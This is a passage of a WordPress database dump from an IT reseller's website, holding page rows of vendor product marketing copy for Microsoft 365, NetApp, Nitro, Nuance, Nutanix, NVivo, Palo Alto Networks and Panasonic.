class=\"body-alt pmg-ff-segoe-ui-normal pmg-cl-black pmg-list-style-none pmg-ph-0000\">\r\n 	<li class=\"body-alt\">Choose solutions that are right for your business.</li>\r\n 	<li class=\"body-alt\">Get more value for your money.</li>\r\n 	<li class=\"body-alt\">Give your employees to tools they need.</li>\r\n 	<li class=\"body-alt x-hidden-focus\">Ensure you have the latest features and security updates.</li>\r\n</ul>\r\n&nbsp;\r\n<h4 class=\"pmg-ff-segoe-ui-regular header no-margin pmg-pv-0020 pmg-cl-black\">Discover the Microsoft 365 Business advantage</h4>\r\n<p class=\" no-margin xs-pmg-pv-0010 m-pmg-pv-0020 pmg-cl-black\">Microsoft 365 Business brings together features from across Microsoftâ€™s offerings in a solution designed for small and medium-sized businesses. Itâ€™s powered by Office 365 and Windows 10, with device management and security features to help ensure your companyâ€™s data is protected.</p>','Microsoft','','publish','closed','closed','','microsoft','','','2018-12-17 09:53:42','2018-12-17 01:53:42','',0,'https://bintara.com.my/?page_id=1551',0,'page','',0),(1552,1,'2018-12-11 15:40:34','2018-12-11 07:40:34','<h3 class=\"n-hero__content-title\">Integrate Cloud Data Services</h3>\r\n<h4 class=\"n-hero__content-subtitle\">Accelerate your cloud workloads and simplify your data protection.</h4>\r\n&nbsp;\r\n<h4 class=\"n-band__heading\">Get real value from your cloud.</h4>\r\nThe cloud is the single biggest platform for digital transformation. The rapid adoption of fast-evolving technologies, methodologies, and tools is driving innovation across the enterprise.\r\n\r\nOnly NetApp is building a comprehensive set of cloud data services to transform your businessâ€”how, when and where you work.\r\n\r\n&nbsp;\r\n<h3 class=\"ntap-section__header-title ntap-h2-medium\">Your Comprehensive Cloud Data Services Solutions</h3>\r\n<header class=\"ntap-card__header\">\r\n<h4 class=\"ntap-card__title ntap-h4-bold\">Cloud Analytics</h4>\r\n</header>Accelerate time to insight with the most capable storage services in the cloud.\r\n\r\n<strong>PRIMARY WORKLOADS:</strong>\r\n<ul>\r\n 	<li>High-performance computing</li>\r\n 	<li>Business intelligence</li>\r\n 	<li>Machine or deep learning</li>\r\n</ul>\r\n<header class=\"ntap-card__header\">\r\n<h4 class=\"ntap-card__title ntap-h4-bold\">File Services</h4>\r\n</header>Deploy the highest-performing, most available, and feature-rich file services on your choice of cloud.\r\n\r\n<strong>PRIMARY WORKLOADS:</strong>\r\n<ul>\r\n 	<li>Web content management</li>\r\n 	<li>Media and entertainment images</li>\r\n 	<li>Oil and gas repositories</li>\r\n 	<li>Enterprise applications</li>\r\n</ul>\r\n<header class=\"ntap-card__header\">\r\n<h4 class=\"ntap-card__title ntap-h4-bold\">Database</h4>\r\n</header>Deploy or move high-performance databases to the cloud with confidence.\r\n\r\n<strong>PRIMARY WORKLOADS:</strong>\r\n<ul>\r\n 	<li>ERP systems</li>\r\n 	<li>Financial transactions and reporting</li>\r\n 	<li>Customer management</li>\r\n</ul>\r\n<header class=\"ntap-card__header\">\r\n<h4 class=\"ntap-card__title ntap-h4-bold\">DevOps</h4>\r\n</header>Automate your Kubernetes and DevOps tools from storage to containers to clusters.\r\n\r\n<strong>PRIMARY WORKLOADS:</strong>\r\n<ul>\r\n 	<li>Agile software development</li>\r\n 	<li>CI/CD pipeline</li>\r\n 	<li>Artifact repositories</li>\r\n</ul>\r\n<header class=\"ntap-card__header\">\r\n<h4 class=\"ntap-card__title ntap-h4-bold\">Cloud and SaaS Backup</h4>\r\n</header>Use the cloud to protect your on-premises or cloud-native data and SaaS applications.\r\n\r\n<strong>PRIMARY USE CASES:</strong>\r\n<ul>\r\n 	<li>Backup and archive data to the cloud</li>\r\n 	<li>Protect SaaS application data</li>\r\n</ul>\r\n<header class=\"ntap-card__header\">\r\n<h4 class=\"ntap-card__title ntap-h4-bold\">Disaster Recovery</h4>\r\n</header>Increase data availability and promote new value with a cloud-based disaster recovery solution.\r\n\r\n<strong>PRIMARY USE CASES:</strong>\r\n<ul>\r\n 	<li>Enterprise applications</li>\r\n 	<li>File shares</li>\r\n 	<li>Databases</li>\r\n</ul>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','NetApp','','publish','closed','closed','','netapp','','','2018-12-17 09:59:20','2018-12-17 01:59:20','',0,'https://bintara.com.my/?page_id=1552',0,'page','',0),(1553,1,'2018-12-11 15:40:44','2018-12-11 07:40:44','<h3>Work from Anywhere with Nitro Cloud</h3>\r\nWhether you need to merge PDFs online or access your files on the go, Nitro Cloud equips you with the tools to accomplish your goals anytime, anywhere.\r\n\r\n<img class=\"alignnone wp-image-2232 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/pdf-workflows-300x194.png\" alt=\"\" width=\"300\" height=\"194\" />\r\n<h3>Complete your most common PDF workflows online</h3>\r\nIn just a couple clicks, Nitro Cloud can generate an easily accessible link so knowledge workers can securely share files with clients or colleaguesâ€”without the need for email attachments.\r\n\r\n<img class=\"alignnone wp-image-2233 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/convert-files-300x220.png\" alt=\"\" width=\"300\" height=\"220\" />\r\n<h3>Convert Office files to and from PDF online</h3>\r\nWith the online PDF converter in Nitro Cloud, you can quickly convert PDFs to and from Word files, Excel spreadsheets, and PowerPoint presentations to more easily work with the file formats you use most.\r\n\r\n<img class=\"alignnone wp-image-2234 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/connect-documents-300x164.png\" alt=\"\" width=\"300\" height=\"164\" />\r\n<h3>Connect to your documents in the cloud</h3>\r\nNo need to worry about not being able to access your files while away from your primary computer. Nitro Cloud allows you to access and store documents from any web browser or mobile device thanks to integrations with your favorite document repositories, including Dropbox, Google Drive, OneDrive, SharePoint, Office 365, and Box.\r\n\r\n<img class=\"alignnone wp-image-2235 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/maximize-time-253x300.png\" alt=\"\" width=\"253\" height=\"300\" />\r\n<h3>Maximize your time</h3>\r\nWith around-the-clock access to your important files and most common document workflows, you can optimize your time and productivity while on the goâ€”from combining and sharing files with a client at their office, to reviewing a document while on vacation, to converting a PDF to Word so you can download and edit the document on your home computer.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Nitro','','publish','closed','closed','','nitro','','','2018-12-17 09:36:21','2018-12-17 01:36:21','',0,'https://bintara.com.my/?page_id=1553',0,'page','',0),(1554,1,'2018-12-11 15:37:43','2018-12-11 07:37:43','','Kaspersky','','inherit','closed','closed','','1543-revision-v1','','','2018-12-11 15:37:43','2018-12-11 07:37:43','',1543,'https://bintara.com.my/blog/2018/12/11/1543-revision-v1/',0,'revision','',0),(1555,1,'2018-12-11 15:41:13','2018-12-11 07:41:13','<h2>Leading the way in PDF productivity</h2>		\n		<h3>Gain control of your PDFs</h3><p>From the leader in secure document workflows, NuanceÂ® Power PDF is the ultimate PDF solution. Perfect for the individual or the enterprise, itâ€™s simply the best way to gain control over PDF files. Power PDF provides superior accuracy, industry standard PDF compatibility and is exceptionally easy to use.</p>https://youtu.be/KJ7-lKGvGQg		\n			<h3>The right PDF solution for every need</h3>		\n		<h3>Create and convert</h3><p>Power PDF is the fastest, most accurate PDF solution available.<br />It faithfully reproduces complex layouts from PDFs or scanned documents in editable formats â€“ even those with columns, tables and graphics.</p><h3>Edit and combine</h3><p>Quickly touch up and edit text and images in PDF files. Power PDF word processing like capabilities sets it apart in ease-of-use.<br />Assemble and organize PDFs with intuitive drag-and-drop tools.</p><h3>Sign and collaborate</h3><p>Power PDF Advanced streamlines document reviews, signing and collaborating.<br />It offers integrated DocuSignÂ® capabilities, fillable forms, and real-time local network collaboration.</p><h4>There are many options today, but only one makes sense: Nuance Power PDF</h4><p>Power PDF provides the ease of use and the advanced functionality to do the job correctlyâ€”at a price that makes sense. See why switching from Adobe Acrobat is a good business decision.</p>		\n										<img width=\"250\" height=\"230\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/box-power-pdf-standard3-left-250x230-en-us.png\" alt=\"\" />											\n		<h3>Power PDF Standard</h3><h4>Fast and accurate conversion and editing</h4><p>Most accurate PDF to Word or Excel conversions of any PDF solution</p><p>Combine, edit, assemble, fill forms and share PDF files</p><p>Scan paper to PDF and create Searchable PDF files</p><p>Easy-to-use Office-style interface with clear and accessible tools</p><p>[maxbutton id=\"1\" ]</p>		\n										<img width=\"250\" height=\"230\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/box-power-pdf-advanced3-left-250x230-en-us.png\" alt=\"\" />											\n		<h3>Power PDF Advanced</h3><h4>For enhanced security, signing and collaboration</h4><p>Includes all the features of Power PDF Standard as well as additional features for connectivity, collaboration, security and redaction</p><p>Sign and send PDFs for signature with DocuSignÂ®</p><p>Real time collaboration lets multiple people work on the same document, at the same time, over a network</p><p>[maxbutton id=\"1\" ]</p>		\n										<img width=\"210\" height=\"230\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/icon-img-power-pdf.png\" alt=\"\" />											\n		<h3>Power PDF Advanced: Volume Licensing</h3><h4>Enterprise deployment with a single license to manage</h4><p>Reasonable cost of ownership with fewer products to manage and expert customer support</p><p>Capture budget savings on licensing</p><p>Superior IT management with flexible and customizable deployment options</p><p>[maxbutton id=\"1\" ]</p>','Nuance','','publish','closed','closed','','nuance','','','2019-01-03 14:47:54','2019-01-03 06:47:54','',0,'https://bintara.com.my/?page_id=1555',0,'page','',0),(1556,1,'2018-12-11 15:38:09','2018-12-11 07:38:09','','Kingston','','inherit','closed','closed','','1544-revision-v1','','','2018-12-11 15:38:09','2018-12-11 07:38:09','',1544,'https://bintara.com.my/blog/2018/12/11/1544-revision-v1/',0,'revision','',0),(1557,1,'2018-12-11 15:38:30','2018-12-11 07:38:30','','Lenovo','','inherit','closed','closed','','1545-revision-v1','','','2018-12-11 15:38:30','2018-12-11 07:38:30','',1545,'https://bintara.com.my/blog/2018/12/11/1545-revision-v1/',0,'revision','',0),(1558,1,'2018-12-11 15:38:45','2018-12-11 07:38:45','','LG','','inherit','closed','closed','','1546-revision-v1','','','2018-12-11 15:38:45','2018-12-11 07:38:45','',1546,'https://bintara.com.my/blog/2018/12/11/1546-revision-v1/',0,'revision','',0),(2856,1,'2019-02-07 16:27:10','2019-02-07 08:27:10','','Evolve_65','','inherit','closed','closed','','evolve_65','','','2019-02-07 16:27:10','2019-02-07 08:27:10','',1532,'https://bintara.com.my/wp-content/uploads/2019/02/Evolve_65.png',0,'attachment','image/png',0),(1560,1,'2018-12-11 15:39:17','2018-12-11 07:39:17','','MapInfo','','inherit','closed','closed','','1548-revision-v1','','','2018-12-11 15:39:17','2018-12-11 07:39:17','',1548,'https://bintara.com.my/blog/2018/12/11/1548-revision-v1/',0,'revision','',0),(1561,1,'2018-12-11 15:39:31','2018-12-11 07:39:31','','McAfee','','inherit','closed','closed','','1549-revision-v1','','','2018-12-11 15:39:31','2018-12-11 07:39:31','',1549,'https://bintara.com.my/blog/2018/12/11/1549-revision-v1/',0,'revision','',0),(1563,1,'2018-12-11 15:40:04','2018-12-11 07:40:04','','Microsoft','','inherit','closed','closed','','1551-revision-v1','','','2018-12-11 15:40:04','2018-12-11 07:40:04','',1551,'https://bintara.com.my/blog/2018/12/11/1551-revision-v1/',0,'revision','',0),(1564,1,'2018-12-11 15:40:34','2018-12-11 07:40:34','','NetApp','','inherit','closed','closed','','1552-revision-v1','','','2018-12-11 15:40:34','2018-12-11 07:40:34','',1552,'https://bintara.com.my/blog/2018/12/11/1552-revision-v1/',0,'revision','',0),(1565,1,'2018-12-11 15:40:44','2018-12-11 07:40:44','','Nitro','','inherit','closed','closed','','1553-revision-v1','','','2018-12-11 15:40:44','2018-12-11 07:40:44','',1553,'https://bintara.com.my/blog/2018/12/11/1553-revision-v1/',0,'revision','',0),(1566,1,'2018-12-11 15:41:13','2018-12-11 07:41:13','','Nuance','','inherit','closed','closed','','1555-revision-v1','','','2018-12-11 15:41:13','2018-12-11 07:41:13','',1555,'https://bintara.com.my/blog/2018/12/11/1555-revision-v1/',0,'revision','',0),(1567,1,'2018-12-11 15:42:45','2018-12-11 07:42:45','<h3><span class=\"color-accent-2\">Bring the Power of Enterprise Cloud Solutions to the Datacenter</span></h3>\r\n<div class=\"fl-row fl-row-full-width fl-row-bg-none fl-node-58ad2a2ac6c1e row-after-hero blocks-large-pt blocks-md-no-pt blocks-sm-no-pt blocks-large-pb blocks-md-no-pb blocks-sm-no-pb bg--double-angle default-color-theme--bg default-color-theme--top default-color-theme--bottom no-scroll-to-section\" data-node=\"58ad2a2ac6c1e\">\r\n<div class=\"fl-row-content-wrap\">\r\n<div class=\"fl-row-content fl-row-fixed-width fl-node-content\">\r\n<div class=\"fl-col-group fl-node-58ad2a2ac6b7f\" data-node=\"58ad2a2ac6b7f\">\r\n<div class=\"fl-col fl-node-58ad2a2ac6eb3\" data-node=\"58ad2a2ac6eb3\">\r\n<div class=\"fl-col-content fl-node-content\">\r\n<div class=\"fl-module fl-module-gz-text fl-node-58ad2a2ac6f51 fl-animation fl-slide-up fl-animated\" data-node=\"58ad2a2ac6f51\" data-animation-delay=\"0.0\">\r\n<div class=\"fl-module-content fl-node-content\">\r\n<div id=\"\" class=\"base-text blocks-no-pt blocks-md-no-pt blocks-sm-no-pt blocks-small-pb blocks-md-no-pb blocks-sm-no-pb default-color-theme\">\r\n<h4><img class=\"alignnone wp-image-2200 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/homestory-desktop-198x300.png\" alt=\"\" width=\"198\" height=\"300\" /></h4>\r\n<h4>The industryâ€™s leading hyperconverged solution delivers any application at any scale to power your business growth.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"fl-col-group fl-node-58b08fb5149c5\" data-node=\"58b08fb5149c5\">\r\n<div class=\"fl-col fl-node-58b08fb514c31\" data-node=\"58b08fb514c31\">\r\n<div class=\"fl-col-content fl-node-content\">\r\n<div class=\"fl-module fl-module-gz-text fl-node-58b08fccb04ca fl-animation fl-slide-up fl-animated\" data-node=\"58b08fccb04ca\" data-animation-delay=\"0.0\">\r\n<div class=\"fl-module-content fl-node-content\">\r\n<div id=\"\" class=\"base-text blocks-no-pt blocks-md-no-pt blocks-sm-no-pt blocks-no-pb blocks-md-no-pb blocks-sm-no-pb default-color-theme\">\r\n<p class=\"p2\">The Nutanix Enterprise Cloud Platform simplifies infrastructure management so you can focus on delivering business value and innovation. Integrated data protection, non-disruptive upgrades, and self-healing systems ensure predictable performance, reliable disaster recovery, and efficient operations at lower cost.Â Get the power of One OS, One Click<sup>TM</sup>.</p>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"fl-col fl-node-58b08fb514c7c fl-col-small\" data-node=\"58b08fb514c7c\">\r\n<div class=\"fl-col-content fl-node-content\">\r\n<h4 class=\"homestory__main__heading\">What is Nutanix Enterprise Cloud?</h4>\r\n<p class=\"homestory__main__text\">Nutanix Enterprise Cloud combines the agility and simplicity of the public cloud, with the security and control you need in a private cloud. Built on the industryâ€™s leadingÂ hyperconverged infrastructureÂ (HCI) technology, it integrates compute, storage, virtualization and networking in a full-stack solution that runs nearly any application.</p>\r\n\r\n<h4 class=\"homestory__main__heading\">Why Nutanix?</h4>\r\n<p class=\"homestory__main__text\">Only Nutanix delivers a single software OS that runs across clouds, making the boundaries between private, public and distributed clouds invisible. Nutanix solutions combine web-scale engineering with consumer-grade management to power any workload in multi-cloud environments.</p>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"fl-row fl-row-full-width fl-row-bg-none fl-node-58ad2a2ac7316 blocks-medium-pt blocks-md-no-pt blocks-sm-no-pt blocks-no-pb blocks-md-no-pb blocks-sm-no-pb no-scroll-to-section\" data-node=\"58ad2a2ac7316\">\r\n<div class=\"fl-row-content-wrap\">\r\n<div class=\"fl-row-content fl-row-fixed-width fl-node-content\">\r\n<div class=\"fl-col-group fl-node-58ad2a2ac87c4\" data-node=\"58ad2a2ac87c4\">\r\n<div class=\"fl-col fl-node-58ad2a2ac880f\" data-node=\"58ad2a2ac880f\">\r\n<div class=\"fl-col-content fl-node-content\">\r\n<div class=\"fl-module fl-module-gz-text fl-node-58ad2a2ac6a0d fl-animation fl-slide-up fl-animated\" data-node=\"58ad2a2ac6a0d\" data-animation-delay=\"0.0\">\r\n<div class=\"fl-module-content fl-node-content\">\r\n<div id=\"\" class=\"base-text blocks-no-pt blocks-md-no-pt blocks-sm-no-pt blocks-medium-pb blocks-md-no-pb blocks-sm-no-pb default-color-theme\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Nutanix','','publish','closed','closed','','nutanix','','','2018-12-14 16:44:42','2018-12-14 08:44:42','',0,'https://bintara.com.my/?page_id=1567',0,'page','',0),(1568,1,'2018-12-11 15:42:56','2018-12-11 07:42:56','<h3>NVivo</h3>\r\nNVivo is the most used qualitative and mixed-methods data analysis software tool by academics and professional researchers globally. NVivo is ideal for complex research projects, whether youâ€™re working solo or in a team. Enrich your understanding with NVivo.\r\n<h3>Store and organize</h3>\r\nStore and sort all your data in one platform, from quantifiable demographic information to qualitative open-ended questions and interviews.\r\n<h3>Categorize and analyze</h3>\r\nUse powerful tools to categorize and classify your data. Automatically sort sentiment, themes and attributes in seconds. Quickly exchange data with SPSS for further statistical analysis.\r\n<h3>Visualize and discover</h3>\r\nEasily cross tabulate mixed methods data and visualize the results to brainstorm and map ideas, explore connections between project items and discover new paths of investigation.\r\n\r\n<hr />\r\n\r\n<img class=\"alignnone wp-image-1925 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Research-getting-published_370px-x-300px-300x243.png\" alt=\"\" width=\"300\" height=\"243\" />\r\n<h4>Research getting published</h4>\r\nFacilitating rigorous analysis that leads to research being published\r\n\r\n<img class=\"alignnone wp-image-1927 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PhD-research_370px-x-300px-300x243.png\" alt=\"\" width=\"300\" height=\"243\" />\r\n<h4>PhD research</h4>\r\nHelping PhD students produce more robust research over relying on manual research methods\r\n\r\n<img class=\"alignnone wp-image-1928 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Not-for-profit-support_370px-x-300px-300x243.png\" alt=\"\" width=\"300\" height=\"243\" />\r\n<h4>Not-for-profit support</h4>\r\nIdentifying ways to increase the impact of not-for-profits in raising funds and awareness\r\n\r\n<img class=\"alignnone wp-image-1929 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Public-health-studies_370px-x-300px-300x243.png\" alt=\"\" width=\"300\" height=\"243\" />\r\n<h4>Public health studies</h4>\r\nAnalyzing population health to influenceÂ <em>public health</em>policy, practices and education\r\n\r\n<img class=\"alignnone wp-image-1931 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Research-grant-funding_370px-x-300px-300x243.png\" alt=\"\" width=\"300\" height=\"243\" />\r\n<h4>Research grant funding</h4>\r\nRigorously backing up findings with evidence-based research to increase success of finding\r\n\r\n<img class=\"alignnone wp-image-1932 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Finding-the-best-minds_370px-x-300px-300x243.png\" alt=\"\" width=\"300\" height=\"243\" />\r\n<h4>Finding the best minds</h4>\r\nAttracting and retaining top staff and students with the most advanced research tools\r\n\r\n[maxbutton id=\"1\" ]','NVivo','','publish','closed','closed','','nvivo','','','2018-12-14 09:28:54','2018-12-14 01:28:54','',0,'https://bintara.com.my/?page_id=1568',0,'page','',0),(1569,1,'2018-12-11 15:43:16','2018-12-11 07:43:16','<h2>NEXT-GENERATION FIREWALL</h2>\r\nOur next-generation firewalls secure your business with a prevention-focused architecture and integrated innovations that are easy to deploy and use. Now, you can accelerate growth and eliminate risks at the same time.\r\n\r\nOur next-generation firewalls are available as physical appliances, virtualized appliances and cloud-delivered service, all managed consistently with Panorama.\r\n<ul>\r\n 	<li><strong>Harness shared intelligence to prevent successful attacks</strong></li>\r\n</ul>\r\nPalo Alto NetworksÂ® next-generation firewalls detect known and unknown threats, including in encrypted traffic, using intelligence generated across many thousands of customer deployments. That means they reduce risks and prevent a broad range of attacks.\r\n<ul>\r\n 	<li><strong>Automate to save time and focus on what matters most</strong></li>\r\n</ul>\r\nWith our next-generation firewalls, you can quickly create security rules that mirror business policy, are easy to maintain and adapt to your dynamic environment. They reduce response times with automated policy-based actions, and you can automate workflows via integration with administrative tools, such as ticketing services, or any system with a RESTful API.\r\n<ul>\r\n 	<li><strong>Leverage innovations that help you adapt</strong></li>\r\n</ul>\r\nOur next-generation firewalls give you access to the latest innovations of Palo Alto Networks Security Operating Platform.\r\n<h3>Products :</h3>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"120\"><img class=\"wp-image-2529 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA-7000.jpg\" alt=\"\" width=\"131\" height=\"115\" />\r\n<p style=\"text-align: center;\"><strong>PA-7000 Series</strong></p>\r\nPerfect blend of power, intelligence, simplicity and versatility for enterprise and service provider deployments</td>\r\n<td width=\"120\">&nbsp;\r\n\r\n<img class=\"alignnone size-full wp-image-2528\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA-5250.jpg\" alt=\"\" width=\"440\" height=\"196\" />\r\n<p style=\"text-align: center;\"><strong>PA-5200 Series</strong></p>\r\nNo-compromise security and high-performance versatility for data centers and service providers</td>\r\n<td width=\"120\">&nbsp;\r\n\r\n<img class=\"wp-image-2531 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA-5000.jpg\" alt=\"\" width=\"167\" height=\"58\" />\r\n<p style=\"text-align: center;\"><strong>PA-5000 Series</strong></p>\r\nHigh-performance with one consistent architecture for data center deployments</td>\r\n<td width=\"120\">&nbsp;\r\n\r\n<img class=\"alignnone size-full wp-image-2538\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA-3200.jpg\" alt=\"\" width=\"374\" height=\"135\" />\r\n<p style=\"text-align: center;\"><strong>PA-3200 Series</strong></p>\r\nPredictable performance and broad threat coverage for the internet edge</td>\r\n<td width=\"120\">&nbsp;\r\n\r\n<img class=\"alignnone size-full wp-image-2539\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA-3000.png\" alt=\"\" width=\"616\" height=\"195\" />\r\n<p style=\"text-align: center;\"><strong>PA-3000 Series</strong></p>\r\nMulti-gigabit throughput to prevent attacks on the internet edge</td>\r\n</tr>\r\n<tr>\r\n<td width=\"120\"><img class=\"alignnone size-full wp-image-2541\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA-800.jpg\" alt=\"\" width=\"440\" height=\"150\" />\r\n<p style=\"text-align: center;\"><strong>PA-800 Series</strong></p>\r\nRock-solid security for the branch and midsize business</td>\r\n<td width=\"120\">&nbsp;\r\n\r\n<img class=\"alignnone size-full wp-image-2542\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA500_FT.jpg\" alt=\"\" width=\"700\" height=\"123\" />\r\n<p style=\"text-align: center;\"><strong>PA-500</strong></p>\r\nConsistent architecture for a broad range of small-business applications</td>\r\n<td width=\"120\"><img class=\"alignnone size-full wp-image-2544\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA-220R.jpg\" alt=\"\" width=\"1600\" height=\"523\" />\r\n<p style=\"text-align: center;\"><strong>PA-220R</strong></p>\r\nRuggedized form factor for industrial applications</td>\r\n<td width=\"120\">&nbsp;\r\n\r\n<img class=\"alignnone size-full wp-image-2547\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA-220.jpg\" alt=\"\" width=\"640\" height=\"238\" />\r\n<p style=\"text-align: center;\"><strong>PA-220</strong></p>\r\nSmall form factor with the power to prevent network threats</td>\r\n<td width=\"120\"><img class=\"alignnone size-full wp-image-2546\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA-200.png\" alt=\"\" width=\"960\" height=\"420\" />\r\n<p style=\"text-align: center;\"><strong>PA-200</strong></p>\r\nNext-generation firewall in a small footprint</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>CLOUD SECURITY</h2>\r\n<ol>\r\n 	<li>\r\n<h3>Redlock</h3>\r\n</li>\r\n</ol>\r\nRedLock is a critical element of the Palo Alto Networks Security Operating Platform, enabling you to benefit from the industryâ€™s most complete offering for public cloud security. Our other cloud products allow you to:\r\n<ul>\r\n 	<li>Protect and segment cloud workloads</li>\r\n 	<li>Adopt advanced host-based protection</li>\r\n</ul>\r\n<h3>2.Â Aperture</h3>\r\nSecure the business-critical data within your SaaS applications.\r\n<ul>\r\n 	<li><strong>Risk discovery and deep visibility</strong></li>\r\n</ul>\r\nAperture provides complete visibility across all user and data activity, along with detailed analysis that helps you transition from speculation to certainty about whatâ€™s happening at any given point in time.\r\n<ul>\r\n 	<li><strong>Data leak prevention and compliance</strong></li>\r\n</ul>\r\nData within enterprise-enabled cloud applications may not be visible to an organizationâ€™s network perimeter. Aperture can connect directly to enterprise SaaS applications to provide:\r\n\r\n-Data classification and monitoring\r\n-Data Loss Prevention (DLP) capabilities\r\n-User activity tracking for anomalies\r\n-Known and unknown malware prevention\r\n-Detailed risk and usage reporting\r\n<ul>\r\n 	<li><strong>Advanced threat prevention</strong></li>\r\n</ul>\r\nYou can keep threats from spreading through the sanctioned SaaS applications, preventing a new insertion point for malware. New malware discovered by Aperture is shared with the rest of the Security Operating Platform, strengthening your overall security posture.\r\n<h3>3. VM-Series</h3>\r\nThe VM-Series offers a unique combination of visibility, control over your applications and data, and protection against both known and unknown threats. The result is an unprecedented level of security for critical deployments in private and public clouds. Specifically, the VM-Series gives you the ability to:\r\n<ul>\r\n 	<li>Protect mission-critical applications and data</li>\r\n 	<li>Block lateral movement of cyberthreats</li>\r\n 	<li>Automate security so it keeps pace with your business</li>\r\n</ul>\r\n<h2>ENDPOINT PROTECTION</h2>\r\n<h3>TRAPS</h3>\r\nProtect endpoints from malware, exploits and ransomware. Trapsâ„¢ advanced endpoint protection stops threats on the endpoint and coordinates enforcement with cloud and network security to prevent successful cyberattacks.\r\n<ul>\r\n 	<li><strong>Simple cloud-based management</strong></li>\r\n</ul>\r\nWith the Traps management service, a cloud-based endpoint security service, you save the time and cost of having to build out your own global security infrastructure. Deployment is simple and fast, requiring no server licenses, databases or other infrastructure to get started.\r\n<ul>\r\n 	<li><strong>Intuitive user experience</strong></li>\r\n</ul>\r\nTraps provides an intuitive interface that makes it easy to manage policies and events, and accelerate incident response â€“ helping to minimize the operational challenges associated with protecting your endpoints. From the Traps management service web console, you can manage the endpoint security policy, review security events as they occur, and perform additional analysis of associated logs.\r\n<ul>\r\n 	<li><strong>Lightweight, non-disruptive agent</strong></li>\r\n</ul>\r\nThe Traps agent enforces your security policy on the endpoint and reports when it detects a threat. The Traps endpoint agent consists of various drivers and services yet requires minimal memory and CPU usage to ensure a non-disruptive user experience. Following its deployment, system administrators have complete control over all Traps agents in the environment through the Traps management service.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;','PaloAlto','','publish','closed','closed','','paloalto','','','2018-12-19 12:47:17','2018-12-19 04:47:17','',0,'https://bintara.com.my/?page_id=1569',0,'page','',0),(1570,1,'2018-12-11 15:43:35','2018-12-11 07:43:35','<h3>HD Visual Communications System Global</h3>\r\n<img class=\"alignnone size-full wp-image-2191\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/main_image02.jpg\" alt=\"\" width=\"967\" height=\"265\" />\r\n\r\nThe Panasonic HD Visual Communications System is a new visual communication tool that is clearly different from previous videoconference systems. High image quality, high sound quality, and a stable connection have been achieved both with intranets and the Internet, enabling easy, comfortable communication between remote locations. The technologies that Panasonic has accumulated from its AV devices serve as the core of this system.\r\n\r\n<img class=\"alignnone size-full wp-image-2192\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/main_image03.jpg\" alt=\"\" width=\"967\" height=\"265\" />\r\n\r\nWith the HD Visual Communications System, you can conduct natural conversations with high image and sound quality, as if the person you are talking to were standing right next to you, for more personal communication. This lets you apply the HD Visual Communications System to a variety of situations that were difficult for conventional videoconference systems.\r\n<div class=\"cat-contentcopy\">\r\n<p class=\"size12\"><strong>The main unit is highly functional, the remote control is easy to use, and the optional boundary microphone has advanced specifications.</strong></p>\r\n\r\n</div>\r\n<h4>Connection to Multiple Sites</h4>\r\nThe HDVC System can connect up to 24 sites without any optional equipment. It can connect via intranet or Internet, thus enabling multi-site videoconferencing with a client or with people in distant locations via mobile devices.\r\n<h4>Easy to Use</h4>\r\n<p class=\"size12 paddingbottom15\">The Triple Monitor function displays a PC document and the images of distant sites and the home location on three monitors. The sub camera function displays fine details in a close-up view. Various convenient functions help to make communication smooth and accurate.</p>\r\n\r\n<h4>Clear Communication</h4>\r\nThe HDVC System incorporates Panasonic\'s high-quality image and sound technologies cultivated in the development of various AV products over the years. The system conveys facial expressions and nuances of voices to facilitate discussions and remote lectures.','Panasonic','','publish','closed','closed','','panasonic','','','2018-12-14 16:00:06','2018-12-14 08:00:06','',0,'https://bintara.com.my/?page_id=1570',0,'page','',0),(1571,1,'2018-12-11 15:43:46','2018-12-11 07:43:46','<h3>Toughbook and Toughpad Range</h3>\r\n<div class=\"field field-name-body field-type-text-with-summary field-label-hidden\">\r\n<div class=\"field-items\">\r\n<div class=\"field-item even\">\r\n\r\nWhatever your sector, whatever your challenge, whatever your working conditions, there will be a Toughbook solution for you, ranging from the ultra-durability of our fully ruggedised Toughbook and Toughpad devices through to our super stylish Toughpad 4K. All models are designed for your needs with the latest technologies and are capable of withstanding the conditions you operate in and can help you go further, achieve more and transform the way you work.\r\n\r\n<img class=\"alignnone size-full wp-image-2195\" 